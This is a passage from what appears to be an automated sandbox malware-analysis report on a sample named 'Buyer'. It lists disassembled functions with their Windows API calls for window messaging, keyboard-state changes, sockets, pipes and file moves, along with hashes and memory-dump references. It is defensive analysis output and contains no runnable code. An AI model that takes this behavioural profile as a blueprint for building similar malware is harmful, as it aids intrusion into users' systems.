                                                                                                      • Part of subcall function 00FA0695: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00FA05C8,80070057,?,?), ref: 00FA06CD
                                                                                                      • Part of subcall function 00FA0695: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00FA05C8,80070057,?,?), ref: 00FA06DB
                                                                                                      • Part of subcall function 00FA0695: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00FA05C8,80070057,?), ref: 00FA06EB
                                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00FC53D8
                                                                                                    • _wcslen.LIBCMT ref: 00FC54E0
                                                                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00FC5556
                                                                                                    • CoTaskMemFree.OLE32(?), ref: 00FC5561
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                    • String ID: NULL Pointer assignment
                                                                                                    • API String ID: 614568839-2785691316
                                                                                                    • Opcode ID: 738606b1c7e205b5fb1a275cc214de845428d47e7614b7519b92354e7d362e1f
                                                                                                    • Instruction ID: afcede07c669842588e5ff86edf7dde9e2a2c190342e8d784503c07c879426fa
                                                                                                    • Opcode Fuzzy Hash: 738606b1c7e205b5fb1a275cc214de845428d47e7614b7519b92354e7d362e1f
                                                                                                    • Instruction Fuzzy Hash: BE913872D002199FDF14DFA4DC91EEEBBB9BF08314F10456AE915A7281DB34AA44DF60
                                                                                                    Function 00FD28B8 Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetMenu.USER32(?), ref: 00FD293E
                                                                                                    • GetMenuItemCount.USER32(00000000), ref: 00FD2970
                                                                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00FD2998
                                                                                                    • _wcslen.LIBCMT ref: 00FD29CE
                                                                                                    • GetMenuItemID.USER32(?,?), ref: 00FD2A08
                                                                                                    • GetSubMenu.USER32(?,?), ref: 00FD2A16
                                                                                                      • Part of subcall function 00FA4128: GetWindowThreadProcessId.USER32(?,00000000), ref: 00FA4142
                                                                                                      • Part of subcall function 00FA4128: GetCurrentThreadId.KERNEL32 ref: 00FA4149
                                                                                                      • Part of subcall function 00FA4128: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00FA2C95), ref: 00FA4150
                                                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00FD2A9E
                                                                                                      • Part of subcall function 00FAEFBC: Sleep.KERNEL32 ref: 00FAF034
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 4196846111-0
                                                                                                    • Opcode ID: 5b8c599db14d8753319782a9f482a4f4e411c26b6e94e3d970a536d105fb3227
                                                                                                    • Instruction ID: 8a5cb0841749eacce6a67a6c260712404275dcf4c2280e82cccdbcd3cafbed78
                                                                                                    • Opcode Fuzzy Hash: 5b8c599db14d8753319782a9f482a4f4e411c26b6e94e3d970a536d105fb3227
                                                                                                    • Instruction Fuzzy Hash: 00718375E00205AFCB51DF64C841AAEB7F6EF59320F18845AE816EB351DB38ED41EB90
                                                                                                    Function 00FD858A Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • IsWindow.USER32(010766C8), ref: 00FD8623
                                                                                                    • IsWindowEnabled.USER32(010766C8), ref: 00FD862F
                                                                                                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00FD870A
                                                                                                    • SendMessageW.USER32(010766C8,000000B0,?,?), ref: 00FD873D
                                                                                                    • IsDlgButtonChecked.USER32(?,?), ref: 00FD8775
                                                                                                    • GetWindowLongW.USER32(010766C8,000000EC), ref: 00FD8797
                                                                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00FD87AF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                    • String ID:
                                                                                                    • API String ID: 4072528602-0
                                                                                                    • Opcode ID: 1a16a3732140d01ffed16a0ec63eb553ddff15e244691e709c5574f713c7430c
                                                                                                    • Instruction ID: 837f6cb51ad37ca9972170513084f41407ef4cbb3194a51f84f391443f8335a1
                                                                                                    • Opcode Fuzzy Hash: 1a16a3732140d01ffed16a0ec63eb553ddff15e244691e709c5574f713c7430c
                                                                                                    • Instruction Fuzzy Hash: AE718F74A05244AFDB219F65C884FAA7BBBFF453A0F18405BE85597351CB32EC42EB10
                                                                                                    Function 00FAB5BB Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetParent.USER32(?), ref: 00FAB5FA
                                                                                                    • GetKeyboardState.USER32(?), ref: 00FAB60F
                                                                                                    • SetKeyboardState.USER32(?), ref: 00FAB670
                                                                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 00FAB69E
                                                                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 00FAB6BD
                                                                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00FAB6FE
                                                                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00FAB721
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                    • String ID:
                                                                                                    • API String ID: 87235514-0
                                                                                                    • Opcode ID: 7e934ac014dd825d9c3e0225f1b9278d15273704ca297d569eaee865fd6d1ea0
                                                                                                    • Instruction ID: b16c4e8878b314c848852d3c8db096d6fd0bcc0f16edcb019ae0caf8161fe1b0
                                                                                                    • Opcode Fuzzy Hash: 7e934ac014dd825d9c3e0225f1b9278d15273704ca297d569eaee865fd6d1ea0
                                                                                                    • Instruction Fuzzy Hash: BE51CDE0E087D63DFB3642348C49BBABEA95B47314F088589E1D9568D3D3D8EC94E760
                                                                                                    Function 00FAB3DB Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetParent.USER32(00000000), ref: 00FAB41A
                                                                                                    • GetKeyboardState.USER32(?), ref: 00FAB42F
                                                                                                    • SetKeyboardState.USER32(?), ref: 00FAB490
                                                                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00FAB4BC
                                                                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00FAB4D9
                                                                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00FAB518
                                                                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00FAB539
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                    • String ID:
                                                                                                    • API String ID: 87235514-0
                                                                                                    • Opcode ID: d53005d733f889f9f745847668bd953045aa33fe22fae07a4a3f4b23ce736ecb
                                                                                                    • Instruction ID: 2454bed1002d5901f6a451190d0806577ca5982e30f7b81be57c7fb0b48f928a
                                                                                                    • Opcode Fuzzy Hash: d53005d733f889f9f745847668bd953045aa33fe22fae07a4a3f4b23ce736ecb
                                                                                                    • Instruction Fuzzy Hash: F951B0E0D086D67DFB3687248C55B7ABEA96B0B310F0C8489E5D9568C3D398EC98F750
                                                                                                    Function 00F7577E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetConsoleCP.KERNEL32(00F84667,?,?,?,?,?,?,?,?,00F75EF3,?,?,00F84667,?,?), ref: 00F757C0
                                                                                                    • __fassign.LIBCMT ref: 00F7583B
                                                                                                    • __fassign.LIBCMT ref: 00F75856
                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00F84667,00000005,00000000,00000000), ref: 00F7587C
                                                                                                    • WriteFile.KERNEL32(?,00F84667,00000000,00F75EF3,00000000,?,?,?,?,?,?,?,?,?,00F75EF3,?), ref: 00F7589B
                                                                                                    • WriteFile.KERNEL32(?,?,00000001,00F75EF3,00000000,?,?,?,?,?,?,?,?,?,00F75EF3,?), ref: 00F758D4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 1324828854-0
                                                                                                    • Opcode ID: d91b37a52cfe13dfcaa8fbecd578b05cd9a08a9d179c49f545720cb5bab3225f
                                                                                                    • Instruction ID: 89dc228d70648988cb1226ccf4251214863ed67bf88e84caa366d5689fa2d85a
                                                                                                    • Opcode Fuzzy Hash: d91b37a52cfe13dfcaa8fbecd578b05cd9a08a9d179c49f545720cb5bab3225f
                                                                                                    • Instruction Fuzzy Hash: 2D51C171E002499FDF10CFA8E845AEEBBB9EF08710F14811FE559E7291D7709A41DB62
                                                                                                    Function 00F63070 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00F6309B
                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00F630A3
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00F63131
                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00F6315C
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00F631B1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                    • String ID: csm
                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                    • Opcode ID: 837831912682b2955cf421c9177070ce6bb504095a9c4d7a94c4e0869ecde7ec
                                                                                                    • Instruction ID: feee945b61040bb61c8340c10e6652fb0cfb4af990be8efa0681ad10f71a8955
                                                                                                    • Opcode Fuzzy Hash: 837831912682b2955cf421c9177070ce6bb504095a9c4d7a94c4e0869ecde7ec
                                                                                                    • Instruction Fuzzy Hash: 6341D134E00218ABCF10DF69CC85A9EBBF5AF45328F148159E819AB392D735DB45EB90
                                                                                                    Function 00FC183F Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00FC37D5: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00FC3801
                                                                                                      • Part of subcall function 00FC37D5: _wcslen.LIBCMT ref: 00FC3822
                                                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00FC1899
                                                                                                    • WSAGetLastError.WSOCK32 ref: 00FC18A8
                                                                                                    • WSAGetLastError.WSOCK32 ref: 00FC1950
                                                                                                    • closesocket.WSOCK32(00000000), ref: 00FC1980
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                                    • String ID:
                                                                                                    • API String ID: 2675159561-0
                                                                                                    • Opcode ID: 45d7d899c4db7f9ea529462da3992c60a18c4c2a06fd812499d6d5ce915e0ec3
                                                                                                    • Instruction ID: c64cc935c74fc88ee7b0957ed0cc2c7420edb37896478671cad63a04e782a5d9
                                                                                                    • Opcode Fuzzy Hash: 45d7d899c4db7f9ea529462da3992c60a18c4c2a06fd812499d6d5ce915e0ec3
                                                                                                    • Instruction Fuzzy Hash: DA412531A00209AFDB109F24C945FA97BEAFF46364F148059FC059B292C774ED41EBE0
                                                                                                    Function 00FAD4E5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00FAE421: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00FAD507,?), ref: 00FAE43E
                                                                                                      • Part of subcall function 00FAE421: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00FAD507,?), ref: 00FAE457
                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00FAD52A
                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00FAD564
                                                                                                    • _wcslen.LIBCMT ref: 00FAD5EA
                                                                                                    • _wcslen.LIBCMT ref: 00FAD600
                                                                                                    • SHFileOperationW.SHELL32(?), ref: 00FAD646
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                    • String ID: \*.*
                                                                                                    • API String ID: 3164238972-1173974218
                                                                                                    • Opcode ID: 30b76daec01fd4b416cb470f036b6f9689ccc997f201d2def04e9c63625ca722
                                                                                                    • Instruction ID: 07eb6443f8be75089b846d002347ccff0a1171a4ff457787b28ce4f3069545ef
                                                                                                    • Opcode Fuzzy Hash: 30b76daec01fd4b416cb470f036b6f9689ccc997f201d2def04e9c63625ca722
                                                                                                    • Instruction Fuzzy Hash: B14152B5D452189FDF12EBA4CD81ADD77B8AF09344F0400E6A506EB641EB38AB88DF50
                                                                                                    Function 00FD35BB Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00FD35DA
                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00FD360D
                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00FD3642
                                                                                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00FD3674
                                                                                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00FD369E
                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00FD36AF
                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00FD36C9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LongWindow$MessageSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 2178440468-0
                                                                                                    • Opcode ID: 6383b006c84d08591215c3f6f4eb9db0dc00f60111a29651b7d96fe6afca7d93
                                                                                                    • Instruction ID: 7fabbf150242d6ab7e299e8943d8c0a6acf91da958987b610847ccb21cf1692c
                                                                                                    • Opcode Fuzzy Hash: 6383b006c84d08591215c3f6f4eb9db0dc00f60111a29651b7d96fe6afca7d93
                                                                                                    • Instruction Fuzzy Hash: 47311935A45254AFDB21DF18DC84F5937A2FB49760F1901A6F6408F3B2CB75E940EB42
                                                                                                    Function 00FB0BA3 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00FB0BC3
                                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00FB0BFF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateHandlePipe
                                                                                                    • String ID: nul
                                                                                                    • API String ID: 1424370930-2873401336
                                                                                                    • Opcode ID: 878830d7572680e6edd054a6b2528f4285c1e70053f3c03c1f4042e0b0896423
                                                                                                    • Instruction ID: d6bcd322e5d1e32e937b4bb19c7c3823d41308090087c1240f2833b695ba49e4
                                                                                                    • Opcode Fuzzy Hash: 878830d7572680e6edd054a6b2528f4285c1e70053f3c03c1f4042e0b0896423
                                                                                                    • Instruction Fuzzy Hash: 5A213DB5900309ABDB209F2ADC45ADB7BA8BF45724F204B19F8A1D72D0EB70D950EF50
                                                                                                    Function 00FB0C78 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00FB0C97
                                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00FB0CD2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateHandlePipe
                                                                                                    • String ID: nul
                                                                                                    • API String ID: 1424370930-2873401336
                                                                                                    • Opcode ID: bec143d248c0f6239117ad610bb805a2d2445a71d286a5683d354da6ff093217
                                                                                                    • Instruction ID: fb85d4b382fb74a689f42def2ca7b39515e7251708d2bf80e8ca400e50790c9f
                                                                                                    • Opcode Fuzzy Hash: bec143d248c0f6239117ad610bb805a2d2445a71d286a5683d354da6ff093217
                                                                                                    • Instruction Fuzzy Hash: 69211D759003099BDB209F6ADC44ADE7BA8AF59734F200A19E9A5D72D1DF70E840EF50
                                                                                                    Function 00FD486D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F466CB: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00F46709
                                                                                                      • Part of subcall function 00F466CB: GetStockObject.GDI32(00000011), ref: 00F4671D
                                                                                                      • Part of subcall function 00F466CB: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F46727
                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00FD48D2
                                                                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00FD48DF
                                                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00FD48EA
                                                                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00FD48F9
                                                                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00FD4905
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                                                    • String ID: Msctls_Progress32
                                                                                                    • API String ID: 1025951953-3636473452
                                                                                                    • Opcode ID: a76e8957d9e224b012a15a9cdceff3cae3482b28950dbadc13a4a6edaecea9bd
                                                                                                    • Instruction ID: ba703bfbe29dc7e8c351b5affc5de294978a0d49916b7de535960fce1c626c97
                                                                                                    • Opcode Fuzzy Hash: a76e8957d9e224b012a15a9cdceff3cae3482b28950dbadc13a4a6edaecea9bd
                                                                                                    • Instruction Fuzzy Hash: 3311B2B215021DBFEF118E65CC81EE77F9DEF08798F014111FA48A6190C6769C62EBA4
